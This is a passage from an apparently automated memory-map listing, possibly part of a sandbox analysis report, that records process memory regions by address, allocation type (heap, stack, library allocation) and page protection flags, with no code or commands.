heap
page read and write
1AA50000
trusted library allocation
page read and write
1C770000
unkown
page read and write
22BF5887000
heap
page read and write
22BF85F5000
heap
page read and write
22BF85CC000
heap
page read and write
22BF8594000
heap
page read and write
22BF85E4000
heap
page read and write
5A02000
heap
page read and write
27474BF9000
heap
page read and write
22BF858C000
heap
page read and write
22BF7C70000
heap
page read and write
1CB4C784000
trusted library allocation
page read and write
22BF851C000
heap
page read and write
1CAF5000
unkown
page read and write
22BF7C3F000
heap
page read and write
22BF8534000
heap
page read and write
22BF7A03000
heap
page read and write
22BF79FA000
heap
page read and write
1B940000
trusted library allocation
page read and write
26A6000
trusted library allocation
page read and write
22BF79FB000
heap
page read and write
22BF8564000
heap
page read and write
22BF85D4000
heap
page read and write
22BF7A22000
heap
page read and write
27474C3D000
heap
page read and write
1B830000
trusted library allocation
page read and write
1B000040000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
7DF431884000
unkown
page read and write
1AB43000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
22BF79FB000
heap
page read and write
22BF85EC000
heap
page read and write
1B018786000
heap
page read and write
7FF887A4D000
trusted library allocation
page execute and read and write
1B780000
trusted library allocation
page read and write
5979000
heap
page read and write
1B0188E0000
trusted library allocation
page read and write
22BF7C77000
heap
page read and write
22BF7C83000
heap
page read and write
2746C6FF000
trusted library allocation
page read and write
7FF887C20000
trusted library allocation
page read and write
1B460000
trusted library allocation
page read and write
1AEB0000
trusted library allocation
page read and write
1CB4C8CE000
trusted library allocation
page read and write
2A5AAC41000
heap
page read and write
22BF7C08000
heap
page read and write
44D2DBF000
stack
page read and write
22BF86FA000
heap
page read and write
1AB40000
trusted library allocation
page read and write
22BF85F1000
heap
page read and write
1B550000
trusted library allocation
page read and write
895000
unkown
page readonly
1AB60000
trusted library allocation
page read and write
1B7B0000
trusted library allocation
page read and write
22BF7AAB000
heap
page read and write
22BF7C68000
heap
page read and write
1AB43000
trusted library allocation
page read and write
1B010351000
trusted library allocation
page read and write
2745C1F0000
trusted library allocation
page read and write
22BF851F000
heap
page read and write
22BF7C6A000
heap
page read and write
BE0000
trusted library allocation
page read and write
7FF887C40000
trusted library allocation
page read and write
22BF7C83000
heap
page read and write
1AB10000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
1BC90000
trusted library allocation
page read and write
22BF7EB0000
unkown
page read and write
22BF7C37000
heap
page read and write
22BF86FA000
heap
page read and write
22BF851E000
heap
page read and write
22BF7A14000
heap
page read and write
A7090BC000
stack
page read and write
22BF7C0F000
heap
page read and write
7FF887BE0000
trusted library allocation
page read and write
1B630000
trusted library allocation
page read and write
27474C8D000
heap
page read and write
7FF887B20000
trusted library allocation
page read and write
22BF8540000
heap
page read and write
22BF85CC000
heap
page read and write
2745E1E5000
trusted library allocation
page read and write
1B000340000
heap
page execute and read and write
1AC10000
heap
page read and write
2746C441000
trusted library allocation
page read and write
2400000
trusted library allocation
page read and write
7FF887A3D000
trusted library allocation
page execute and read and write
1AC11000
heap
page read and write
1B000163000
heap
page read and write
1B0186B2000
heap
page read and write
1AEF0000
trusted library allocation
page read and write
1AE10000
trusted library allocation
page read and write
22BF7C77000
heap
page read and write
1BB70000
trusted library allocation
page read and write
400000
unkown
page readonly
22BF7C40000
heap
page read and write
7FF887CA0000
trusted library allocation
page read and write
22BF7A99000
heap
page read and write
22BF853B000
heap
page read and write
1AB70000
trusted library allocation
page read and write
22BF7A03000
heap
page read and write
22BF7C83000
heap
page read and write
1AB60000
trusted library allocation
page read and write
23D229E0000
heap
page read and write
22BF85F1000
heap
page read and write
7FF887D40000
trusted library allocation
page read and write
23D20D90000
heap
page read and write
1AA77000
trusted library allocation
page read and write
1AB70000
trusted library allocation
page read and write
22BF85B4000
heap
page read and write
22BF7AAB000
heap
page read and write
7FF887E60000
trusted library allocation
page read and write
7FF887D90000
trusted library allocation
page read and write
1B780000
trusted library allocation
page read and write
22BF7A99000
heap
page read and write
1CB63666000
heap
page read and write
22BF7C13000
heap
page read and write
22BF7C1F000
heap
page read and write
1B750000
trusted library allocation
page read and write
22BF7C68000
heap
page read and write
22BF85C7000
heap
page read and write
1BAA7000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
22BF7C1F000
heap
page read and write
7FF887C2A000
trusted library allocation
page read and write
1BB00000
trusted library allocation
page read and write
22BF85A4000
heap
page read and write
1AB20000
trusted library allocation
page read and write
59EA000
heap
page read and write
2745AB90000
heap
page read and write
22BF7C37000
heap
page read and write
1BAF0000
trusted library allocation
page read and write
22BF85BC000
heap
page read and write
1AB60000
trusted library allocation
page read and write
44D297E000
stack
page read and write
7FF887A10000
trusted library allocation
page read and write
1CB495B0000
trusted library allocation
page read and write
22BF7C48000
heap
page read and write
1AB43000
trusted library allocation
page read and write
22BF85EC000
heap
page read and write
22BF57F0000
direct allocation
page read and write
22BF79FB000
heap
page read and write
27474F7D000
heap
page read and write
22BF85B4000
heap
page read and write
22BF85E4000
heap
page read and write
22BF58B1000
heap
page read and write
21B0000
heap
page read and write
27474C10000
heap
page read and write
22BF85A5000
heap
page read and write
1AB70000
trusted library allocation
page read and write
22BF7C40000
heap
page read and write
22BF7C57000
heap
page read and write
22BF7A00000
heap
page read and write
2971000
heap
page read and write
1B530000
trusted library allocation
page read and write
22BF7C75000
heap
page read and write
2F6E000
trusted library allocation
page read and write
7FF887DA0000
trusted library allocation
page read and write
22BF7C48000
heap
page read and write
1AB43000
trusted library allocation
page read and write
26D5000
trusted library allocation
page read and write
22BF85F5000
heap
page read and write
7FF78268F000
direct allocation
page execute and read and write
23D20DE0000
heap
page readonly
1B670000
trusted library allocation
page read and write
1B510000
trusted library allocation
page read and write
1B480000
trusted library allocation
page read and write
7FF887C70000
trusted library allocation
page read and write
4FF0000
trusted library allocation
page read and write
1BC60000
trusted library allocation
page read and write
23D22AB1000
heap
page read and write
1CB4C877000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
1CB49570000
heap
page read and write
22BF86FA000
heap
page read and write
1B8B0000
trusted library allocation
page read and write
22BF7C3D000
heap
page read and write
22BF7C6A000
heap
page read and write
1AB63000
trusted library allocation
page read and write
1B010641000
trusted library allocation
page read and write
1CB4C7CD000
trusted library allocation
page read and write
7FF887A52000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
4F0000
heap
page read and write
1B018BD3000
heap
page read and write
23D22EE0000
heap
page read and write
23D22AB8000
heap
page read and write
1B473000
trusted library allocation
page read and write
7FF7823F0000
direct allocation
page execute and read and write
22BF7C6A000
heap
page read and write
1CB49478000
heap
page read and write
1B7B0000
trusted library allocation
page read and write
59CB000
heap
page read and write
22BF7C6A000
heap
page read and write
22BF7C6A000
heap
page read and write
22BF79FB000
heap
page read and write
22BF7C3F000
heap
page read and write
22BF7A1F000
heap
page read and write
CEF000
heap
page read and write
1AA70000
trusted library allocation
page read and write
1CB49430000
heap
page read and write
22BF7C47000
heap
page read and write
22BF85F4000
heap
page read and write
1CB63580000
heap
page read and write
1AB43000
trusted library allocation
page read and write
22BF71F0000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
22BF7C1F000
heap
page read and write
1B5E0000
trusted library allocation
page read and write
22BF8513000
heap
page read and write
44D390B000
stack
page read and write
1AA77000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
C80000
heap
page read and write
1B001190000
trusted library allocation
page read and write
2910000
heap
page read and write
1AB10000
trusted library allocation
page read and write
22BF85E4000
heap
page read and write
22BF85D4000
heap
page read and write
22BF58B0000
heap
page read and write
44D27FD000
stack
page read and write
2749000
trusted library allocation
page read and write
2745DFBF000
trusted library allocation
page read and write
22BF7C68000
heap
page read and write
1B9E0000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
2745C400000
heap
page execute and read and write
1AAD0000
trusted library allocation
page read and write
22BF7C83000
heap
page read and write
22BF859C000
heap
page read and write
22BF7C3F000
heap
page read and write
22BF85AC000
heap
page read and write
1AB50000
trusted library allocation
page read and write
22BF7C77000
heap
page read and write
22BF7C6A000
heap
page read and write
22BF85CC000
heap
page read and write
1B4C0000
trusted library allocation
page read and write
22BF7E34000
unkown
page read and write
7FF887A44000
trusted library allocation
page read and write
2263000
heap
page read and write
7FF782541000
direct allocation
page execute and read and write
22BF7C68000
heap
page read and write
1AB43000
trusted library allocation
page read and write
22BF85AC000
heap
page read and write
22BF58AC000
heap
page read and write
CBB000
heap
page read and write
22BF86FA000
heap
page read and write
23D229E1000
heap
page read and write
22BF86FA000
heap
page read and write
1B07E2AA000
heap
page read and write
1B018BD0000
heap
page read and write
22BF8511000
heap
page read and write
44D388D000
stack
page read and write
22BF7A40000
heap
page read and write
22BF7A99000
heap
page read and write
1B490000
trusted library allocation
page read and write
2747000
trusted library allocation
page read and write
22BF85F8000
heap
page read and write
2745A846000
heap
page read and write
4FB000
heap
page read and write
1AB40000
trusted library allocation
page read and write
22BF7C40000
heap
page read and write
27474CEE000
heap
page read and write
22BF85D4000
heap
page read and write
2A5A9188000
heap
page read and write
1B00130A000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
2615000
heap
page read and write
1CB49645000
heap
page read and write
22BF86FA000
heap
page read and write
7FF887E70000
trusted library allocation
page read and write
1AB50000
trusted library allocation
page read and write
22BF7C2A000
heap
page read and write
1AB43000
trusted library allocation
page read and write
27474BE4000
heap
page read and write
CD8000
heap
page read and write
22BF71F0000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
7FF887A84000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
2976000
heap
page read and write
59E000
heap
page read and write
7FF887A40000
trusted library allocation
page read and write
2D93000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
1B890000
trusted library allocation
page read and write
1B6F0000
trusted library allocation
page read and write
1B010371000
trusted library allocation
page read and write
1AA63000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
1B001E06000
trusted library allocation
page read and write
E445B44000
stack
page read and write
7FF887BB0000
trusted library allocation
page read and write
1ADD4000
heap
page read and write
22BF852E000
heap
page read and write
22BF7C1F000
heap
page read and write
10EE000
heap
page read and write
22BF7A28000
heap
page read and write
594C000
heap
page read and write
1B5F0000
trusted library allocation
page read and write
1ADDA000
heap
page read and write
1AB40000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
22BF7AA4000
heap
page read and write
22BF859C000
heap
page read and write
22BF8520000
heap
page read and write
22BF85D4000
heap
page read and write
1AB60000
trusted library allocation
page read and write
22BF58AC000
heap
page read and write
1ACFF000
heap
page read and write
1B018DFA000
heap
page read and write
1AB43000
trusted library allocation
page read and write
22BF7DC0000
trusted library allocation
page read and write
22BF8554000
heap
page read and write
23D22ADE000
heap
page read and write
7FF887D40000
trusted library allocation
page read and write
44D29F9000
stack
page read and write
69F000
unkown
page read and write
D38000
heap
page read and write
21A0000
heap
page read and write
1AB40000
trusted library allocation
page read and write
22BF85B4000
heap
page read and write
22BF7AAF000
heap
page read and write
22BF7C77000
heap
page read and write
1AADAFA8000
heap
page read and write
1B61A000
stack
page read and write
7FF887C60000
trusted library allocation
page read and write
7FF9080E0000
direct allocation
page execute and read and write
1B560000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
7FF887D90000
trusted library allocation
page read and write
22BF7C1F000
heap
page read and write
2DF3000
trusted library allocation
page read and write
1B001D60000
trusted library allocation
page read and write
1CB4948E000
heap
page read and write
1B7A0000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
1AE90000
trusted library allocation
page read and write
7FF7178DF000
unkown
page readonly
979000
unkown
page readonly
22BF851C000
heap
page read and write
1AB50000
trusted library allocation
page read and write
1BC60000
trusted library allocation
page read and write
22BF589E000
heap
page read and write
22BF8533000
heap
page read and write
1C380000
heap
page read and write
22BF8510000
heap
page read and write
1AADAE69000
unkown
page read and write
22BF7C1F000
heap
page read and write
22BF85A4000
heap
page read and write
24A2C848000
heap
page read and write
22BF7AAF000
heap
page read and write
1B4CE000
stack
page read and write
24A2E341000
heap
page read and write
22BF7C0D000
heap
page read and write
1AB60000
trusted library allocation
page read and write
22BF7AB7000
heap
page read and write
1CB49530000
heap
page read and write
22BF86FA000
heap
page read and write
7FF887CB0000
trusted library allocation
page read and write
1B560000
trusted library allocation
page read and write
1AB73000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
1B560000
trusted library allocation
page read and write
22BF7A22000
heap
page read and write
7FF887C52000
trusted library allocation
page read and write
1CB49330000
heap
page read and write
22BF7C6D000
heap
page read and write
2DAE000
stack
page read and write
1BAB0000
trusted library allocation
page read and write
7FF887ADC000
trusted library allocation
page execute and read and write
1AEE0000
trusted library allocation
page read and write
22BF7BB7000
heap
page read and write
22BF7C75000
heap
page read and write
23D229A0000
heap
page read and write
F25DA7D000
stack
page read and write
1AB43000
trusted library allocation
page read and write
22BF8511000
heap
page read and write
7FF887AC0000
trusted library allocation
page read and write
22BF7C48000
heap
page read and write
BA0000
heap
page read and write
22BF85CC000
heap
page read and write
1AA53000
trusted library allocation
page read and write
59FF000
heap
page read and write
7DF431881000
unkown
page execute read
1AB43000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
7DF431880000
unkown
page read and write
22BF7C37000
heap
page read and write
1B570000
trusted library allocation
page read and write
2DB1000
trusted library allocation
page read and write
1B0186CA000
heap
page read and write
22BF851C000
heap
page read and write
22BF86FA000
heap
page read and write
1AAB0000
trusted library allocation
page read and write
1B781000
direct allocation
page execute and read and write
1B000050000
heap
page readonly
22BF859B000
heap
page read and write
22BF79FB000
heap
page read and write
1B780000
trusted library allocation
page read and write
22BF5887000
heap
page read and write
1AA60000
trusted library allocation
page read and write
7FF887E30000
trusted library allocation
page read and write
897000
unkown
page write copy
1B018B68000
heap
page read and write
22BF7C48000
heap
page read and write
22BF7C68000
heap
page read and write
22BF71F0000
direct allocation
page execute and read and write
1CB4C071000
trusted library allocation
page read and write
1AA70000
trusted library allocation
page read and write
1CB63550000
heap
page execute and read and write
1B790000
trusted library allocation
page read and write
7FF887D80000
trusted library allocation
page read and write
1B48B000
trusted library allocation
page read and write
22BF85C7000
heap
page read and write
22BF859C000
heap
page read and write
1BA40000
trusted library allocation
page read and write
22BF7AB7000
heap
page read and write
CE6000
heap
page read and write
22BF851C000
heap
page read and write
22BF8529000
heap
page read and write
274747CB000
heap
page read and write
22BF58B0000
heap
page read and write
22BF85E2000
heap
page read and write
1AC94000
trusted library allocation
page read and write
7FF887A24000
trusted library allocation
page read and write
22BF7C48000
heap
page read and write
1AC8C000
heap
page read and write
1CB634FB000
heap
page read and write
1B870000
trusted library allocation
page read and write
269C000
trusted library allocation
page read and write
22BF8022000
unkown
page read and write
1AA60000
trusted library allocation
page read and write
23D20D01000
unkown
page execute read
1B4F0000
trusted library allocation
page read and write
1B4A0000
trusted library allocation
page read and write
123C6000
trusted library allocation
page read and write
1AC20000
trusted library allocation
page read and write
1AB10000
trusted library allocation
page read and write
1ABA5000
trusted library allocation
page read and write
5A0A000
heap
page read and write
22BF7C77000
heap
page read and write
1AB10000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
1B8B0000
heap
page read and write
22BF86FA000
heap
page read and write
1E879EAB000
heap
page read and write
7FF8DF02A000
unkown
page write copy
1AB40000
trusted library allocation
page read and write
27474AA0000
trusted library allocation
page read and write
1B550000
trusted library allocation
page read and write
22BF7B4E000
heap
page read and write
7FF887A3B000
trusted library allocation
page read and write
2B24000
heap
page read and write
1B940000
trusted library allocation
page read and write
27474C85000
heap
page read and write
55C000
heap
page read and write
22BF7C33000
heap
page read and write
1AB43000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
1AB70000
trusted library allocation
page read and write
1B790000
trusted library allocation
page read and write
5978000
heap
page read and write
22BF86FA000
heap
page read and write
1AC60000
heap
page read and write
22BF79FB000
heap
page read and write
22BF85F1000
heap
page read and write
24A2CA60000
heap
page read and write
A708C7A000
stack
page read and write
7FF887EB0000
trusted library allocation
page read and write
7DF4EA5D0000
trusted library allocation
page execute and read and write
1AB40000
trusted library allocation
page read and write
22BF7C71000
heap
page read and write
A709B8E000
stack
page read and write
1ADD0000
heap
page read and write
22BF85E4000
heap
page read and write
22BF7C57000
heap
page read and write
274748E0000
heap
page execute and read and write
1AB43000
trusted library allocation
page read and write
1B590000
heap
page read and write
1B018C1B000
heap
page read and write
7FF887CF0000
trusted library allocation
page read and write
22BF7C70000
heap
page read and write
1AEA0000
trusted library allocation
page read and write
1CB4C892000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
1BA66000
trusted library allocation
page read and write
22BF85B4000
heap
page read and write
2745DF84000
trusted library allocation
page read and write
7FF887E63000
trusted library allocation
page read and write
2590000
heap
page read and write
1B550000
trusted library allocation
page read and write
1BC70000
trusted library allocation
page read and write
1AA63000
trusted library allocation
page read and write
1B573000
trusted library allocation
page read and write
23D210D6000
heap
page read and write
22BF79FA000
heap
page read and write
1B9D0000
trusted library allocation
page read and write
E445E7F000
stack
page read and write
22BF7C83000
heap
page read and write
22BF7C83000
heap
page read and write
22BF7AAC000
heap
page read and write
1EAE07A000
stack
page read and write
22BF7C37000
heap
page read and write
2900000
trusted library allocation
page read and write
7FF7177BB000
unkown
page read and write
22BF7AA8000
heap
page read and write
22BF859C000
heap
page read and write
22BF85B4000
heap
page read and write
22BF7D80000
unkown
page read and write
2350000
trusted library section
page read and write
2A5AAD02000
heap
page read and write
22BF85BC000
heap
page read and write
7FF887CF0000
trusted library allocation
page read and write
24A2E240000
heap
page read and write
22BF7A06000
heap
page read and write
A709C89000
stack
page read and write
22BF8524000
heap
page read and write
7FF887E80000
trusted library allocation
page read and write
22BF7C6A000
heap
page read and write
1BA40000
trusted library allocation
page read and write
5965000
heap
page read and write
1B590000
trusted library allocation
page read and write
B90000
heap
page readonly
22BF852A000
heap
page read and write
1BA00000
trusted library allocation
page read and write
22BF85EC000
heap
page read and write
1BAA2000
trusted library allocation
page read and write
27474B09000
heap
page read and write
22BF7C77000
heap
page read and write
22BF7C68000
heap
page read and write
22BF7C40000
heap
page read and write
1B860000
trusted library allocation
page read and write
652C000
stack
page read and write
7FF887A30000
trusted library allocation
page read and write
1B780000
direct allocation
page execute and read and write
22BF7C83000
heap
page read and write
7FF887C57000
trusted library allocation
page read and write
22BF7A3F000
heap
page read and write
1AB43000
trusted library allocation
page read and write
1B580000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
22BF7A22000
heap
page read and write
1AB13000
trusted library allocation
page read and write
22BF7A14000
heap
page read and write
26DF000
trusted library allocation
page read and write
22BF79FB000
heap
page read and write
612C000
stack
page read and write
22BF86FA000
heap
page read and write
22BF85A4000
heap
page read and write
1AEE0000
trusted library allocation
page read and write
7FF887A7D000
trusted library allocation
page execute and read and write
7FF887B60000
trusted library allocation
page execute and read and write
22BF8509000
heap
page read and write
1AB70000
trusted library allocation
page read and write
22BF8518000
heap
page read and write
22BF7C83000
heap
page read and write
2610000
heap
page read and write
1BB10000
trusted library allocation
page read and write
22BF86FB000
heap
page read and write
B8E000
stack
page read and write
1BBF0000
trusted library allocation
page read and write
22BF7A65000
heap
page read and write
1CB4AF50000
heap
page read and write
1BC72000
direct allocation
page execute and read and write
1B018B62000
heap
page read and write
22BF8540000
heap
page read and write
1BAE0000
trusted library allocation
page read and write
22BF7C75000
heap
page read and write
7FF887C30000
trusted library allocation
page read and write
7FF887DB0000
trusted library allocation
page read and write
22BF7E19000
heap
page read and write
22BF7C6A000
heap
page read and write
22BF854C000
heap
page read and write
1AB10000
trusted library allocation
page read and write
22BF85F5000
heap
page read and write
7FF887A9D000
trusted library allocation
page execute and read and write
1AB43000
trusted library allocation
page read and write
1B650000
trusted library allocation
page read and write
22BF7C6A000
heap
page read and write
22BF7AAF000
heap
page read and write
7FF887D20000
trusted library allocation
page read and write
22BF8512000
heap
page read and write
1AB40000
trusted library allocation
page read and write
22BF7A99000
heap
page read and write
22BF7AAC000
heap
page read and write
7FF887A54000
trusted library allocation
page read and write
22BF7A1E000
heap
page read and write
22BF7C83000
heap
page read and write
1AA70000
trusted library allocation
page read and write
1BAC0000
trusted library allocation
page read and write
22BF7C68000
heap
page read and write
1AB30000
trusted library allocation
page read and write
1AADAF80000
heap
page read and write
7DF431881000
unkown
page execute read
2A5A9040000
heap
page read and write
1B07E1C0000
heap
page read and write
2655000
heap
page read and write
7FF887C10000
trusted library allocation
page execute and read and write
1B0010B2000
trusted library allocation
page read and write
7FF887A5B000
trusted library allocation
page read and write
22BF7C68000
heap
page read and write
22BF7C0F000
heap
page read and write
24A2CA70000
heap
page read and write
CA0000
heap
page read and write
22BF86FA000
heap
page read and write
4D0000
heap
page read and write
22BF85F1000
heap
page read and write
1AB63000
trusted library allocation
page read and write
1AA60000
trusted library allocation
page read and write
7FF887A8B000
trusted library allocation
page read and write
1B740000
trusted library allocation
page read and write
22BF7A40000
heap
page read and write
22BF85F1000
heap
page read and write
22BF7AAF000
heap
page read and write
22BF8523000
heap
page read and write
1AA70000
remote allocation
page read and write
23D20D00000
unkown
page read and write
1B680000
trusted library allocation
page read and write
2D38000
heap
page read and write
1B5A0000
trusted library allocation
page read and write
1BAF0000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
1AC73000
heap
page read and write
22BF8518000
heap
page read and write
7FF887D70000
trusted library allocation
page read and write
22BF79FA000
heap
page read and write
1030000
heap
page read and write
264E000
heap
page read and write
62D336D000
stack
page read and write
22BF7A29000
heap
page read and write
22BF7C68000
heap
page read and write
1B450000
trusted library allocation
page read and write
22BF7C75000
heap
page read and write
5D1000
heap
page read and write
1AC8F000
heap
page read and write
22BF85B4000
heap
page read and write
1AA70000
trusted library allocation
page read and write
21E6000
heap
page read and write
1AB60000
trusted library allocation
page read and write
22BF7C1F000
heap
page read and write
7FF887D20000
trusted library allocation
page read and write
7FF7178DC000
unkown
page write copy
7FF887D74000
trusted library allocation
page read and write
22BF58BC000
heap
page read and write
1BAA0000
trusted library allocation
page read and write
22BF85F8000
heap
page read and write
1B81E000
stack
page read and write
22BF7C0F000
heap
page read and write
22BF8523000
heap
page read and write
7FF887E2C000
trusted library allocation
page read and write
1AB70000
trusted library allocation
page read and write
22BF7C3D000
heap
page read and write
7FF887D80000
trusted library allocation
page read and write
1AA70000
trusted library allocation
page read and write
1AA60000
trusted library allocation
page read and write
2745DD7B000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
22BF7A18000
heap
page read and write
1AA73000
trusted library allocation
page read and write
274748E6000
heap
page execute and read and write
22BF7C48000
heap
page read and write
1B07E2AF000
heap
page read and write
2DA0000
heap
page execute and read and write
7FF887A6D000
trusted library allocation
page execute and read and write
1BB60000
trusted library allocation
page read and write
22BF8584000
heap
page read and write
22BF5740000
unkown
page execute and read and write
1AB70000
trusted library allocation
page read and write
7FF887A70000
trusted library allocation
page read and write
F25DAFC000
stack
page read and write
22BF7AA8000
heap
page read and write
22BF71F0000
direct allocation
page read and write
1AB43000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
22BF7AB7000
heap
page read and write
1B8F0000
trusted library allocation
page read and write
22BF85D4000
heap
page read and write
22BF79FB000
heap
page read and write
22BF7FD7000
heap
page read and write
1AB40000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
1AA70000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
1AB47000
trusted library allocation
page read and write
22BF7A3D000
heap
page read and write
1AF32000
heap
page read and write
2745D5F9000
trusted library allocation
page read and write
A708DBE000
stack
page read and write
22BF7C1B000
heap
page read and write
22BF7BA4000
heap
page read and write
2746C431000
trusted library allocation
page read and write
1BBA9000
trusted library allocation
page read and write
1AD0A000
heap
page read and write
1AB60000
trusted library allocation
page read and write
2C83000
heap
page read and write
594E000
heap
page read and write
102000
stack
page read and write
1AB43000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
24A2C860000
heap
page read and write
1B4E0000
trusted library allocation
page read and write
1B4D0000
trusted library allocation
page read and write
22BF7A04000
heap
page read and write
22BF7C77000
heap
page read and write
1AB40000
trusted library allocation
page read and write
735000
unkown
page read and write
7FF887A22000
trusted library allocation
page read and write
22BF7C77000
heap
page read and write
1B0187D0000
heap
page execute and read and write
1AB40000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
1BC80000
trusted library allocation
page read and write
2B45000
heap
page read and write
7FF887E80000
trusted library allocation
page read and write
22BF8518000
heap
page read and write
D44000
heap
page read and write
22BF852E000
heap
page read and write
22BF7C08000
heap
page read and write
1BB00000
trusted library allocation
page read and write
2A5A9124000
heap
page read and write
22BF7C68000
heap
page read and write
22BF7C77000
heap
page read and write
7FF887DC4000
trusted library allocation
page read and write
22BF85B4000
heap
page read and write
22BF85B4000
heap
page read and write
A30000
heap
page read and write
22BF7C47000
heap
page read and write
1AB43000
trusted library allocation
page read and write
1AB30000
trusted library allocation
page read and write
1AC65000
heap
page read and write
7FF887A9D000
trusted library allocation
page execute and read and write
22BF7C6A000
heap
page read and write
1B570000
trusted library allocation
page read and write
22BF7AA3000
heap
page read and write
22BF86FA000
heap
page read and write
22BF7C01000
heap
page read and write
1B5000
heap
page read and write
12DB8000
trusted library allocation
page read and write
1AC12000
heap
page read and write
7FF887C30000
trusted library allocation
page read and write
22BF7C08000
heap
page read and write
22BF58A8000
heap
page read and write
2A5A900F000
unkown
page execute and read and write
22BF86FA000
heap
page read and write
22BF7C48000
heap
page read and write
D2E000
heap
page read and write
1AB40000
trusted library allocation
page read and write
59CB000
heap
page read and write
22BF7C40000
heap
page read and write
7FF887ED0000
trusted library allocation
page read and write
27474CF0000
heap
page read and write
22BF7C48000
heap
page read and write
7FF887E50000
trusted library allocation
page read and write
2745C290000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
23D22ADE000
heap
page read and write
2745D73E000
trusted library allocation
page read and write
7DF406980000
trusted library allocation
page execute and read and write
22BF86FA000
heap
page read and write
1BB30000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
1AEC0000
trusted library allocation
page read and write
23D229A9000
heap
page read and write
22BF7C58000
heap
page read and write
22BF7C68000
heap
page read and write
7FF887D50000
trusted library allocation
page read and write
22BF7C68000
heap
page read and write
22BF85A4000
heap
page read and write
23D229CA000
heap
page read and write
7FF887BD4000
trusted library allocation
page read and write
1BB40000
trusted library allocation
page read and write
22BF7C68000
heap
page read and write
22BF85CC000
heap
page read and write
2BD0000
heap
page read and write
1CB4947C000
heap
page read and write
24A2E344000
heap
page read and write
22BF85F3000
heap
page read and write
2A5A8FB1000
unkown
page execute read
22BF86FA000
heap
page read and write
2810000
heap
page read and write
1ABF0000
trusted library allocation
page read and write
22BF7C75000
heap
page read and write
1AB70000
trusted library allocation
page read and write
1ADF1000
heap
page read and write
1E0000
heap
page readonly
1AED0000
trusted library allocation
page read and write
22BF85C8000
heap
page read and write
7FF887C02000
trusted library allocation
page read and write
2276000
heap
page read and write
22BF7A03000
heap
page read and write
1AA63000
trusted library allocation
page read and write
7B0000
heap
page read and write
1AC0B000
stack
page read and write
7FF887DC0000
trusted library allocation
page read and write
1BBA0000
trusted library allocation
page read and write
22BF8534000
heap
page read and write
1B9B0000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
22BF7C48000
heap
page read and write
7FF887A53000
trusted library allocation
page execute and read and write
7FF887C70000
trusted library allocation
page read and write
22BF7C75000
heap
page read and write
22BF7C6A000
heap
page read and write
22BF7AAB000
heap
page read and write
22BF7C38000
heap
page read and write
2821000
heap
page read and write
22BF7C83000
heap
page read and write
22BF8524000
heap
page read and write
23D20E00000
direct allocation
page execute and read and write
1EAE1FE000
stack
page read and write
23D20E2B000
heap
page read and write
7FF887E40000
trusted library allocation
page execute and read and write
22BF7C38000
heap
page read and write
22BF858C000
heap
page read and write
1CB4946E000
heap
page read and write
22BF7C68000
heap
page read and write
1AA60000
trusted library allocation
page read and write
1B780000
trusted library allocation
page read and write
22BF7C72000
heap
page read and write
22BF8516000
heap
page read and write
22BF85F1000
heap
page read and write
22BF86FA000
heap
page read and write
22BF7C77000
heap
page read and write
22BF85BC000
heap
page read and write
1B54B000
stack
page read and write
22BF8235000
unkown
page read and write
22BF58A8000
heap
page read and write
26A2000
trusted library allocation
page read and write
22BF7A95000
heap
page read and write
22BF7C27000
heap
page read and write
22BF859C000
heap
page read and write
1B001ECE000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
7FF887E20000
trusted library allocation
page read and write
1AA70000
trusted library allocation
page read and write
22BF8518000
heap
page read and write
22BF7A03000
heap
page read and write
22BF79FA000
heap
page read and write
7FF887D50000
trusted library allocation
page read and write
1AA63000
trusted library allocation
page read and write
44D287E000
stack
page read and write
7FF887B70000
trusted library allocation
page execute and read and write
22BF79FA000
heap
page read and write
22BF7AA8000
heap
page read and write
22BF7C48000
heap
page read and write
1B8E0000
trusted library allocation
page read and write
A708743000
stack
page read and write
22BF8036000
unkown
page read and write
1BACE000
trusted library allocation
page read and write
1B9A0000
trusted library allocation
page read and write
D34000
heap
page read and write
1AB67000
trusted library allocation
page read and write
1AA70000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
2B3E000
heap
page read and write
7FF887CD0000
trusted library allocation
page read and write
1B818000
trusted library allocation
page read and write
1BB50000
trusted library allocation
page read and write
1BB80000
trusted library allocation
page read and write
1B780000
trusted library allocation
page read and write
22BF58B0000
heap
page read and write
1AB70000
trusted library allocation
page read and write
1AB70000
trusted library allocation
page read and write
1B4B0000
trusted library allocation
page read and write
22BF7C68000
heap
page read and write
22BF851C000
heap
page read and write
7FF887CD0000
trusted library allocation
page read and write
5946000
heap
page read and write
1C6F4000
unkown
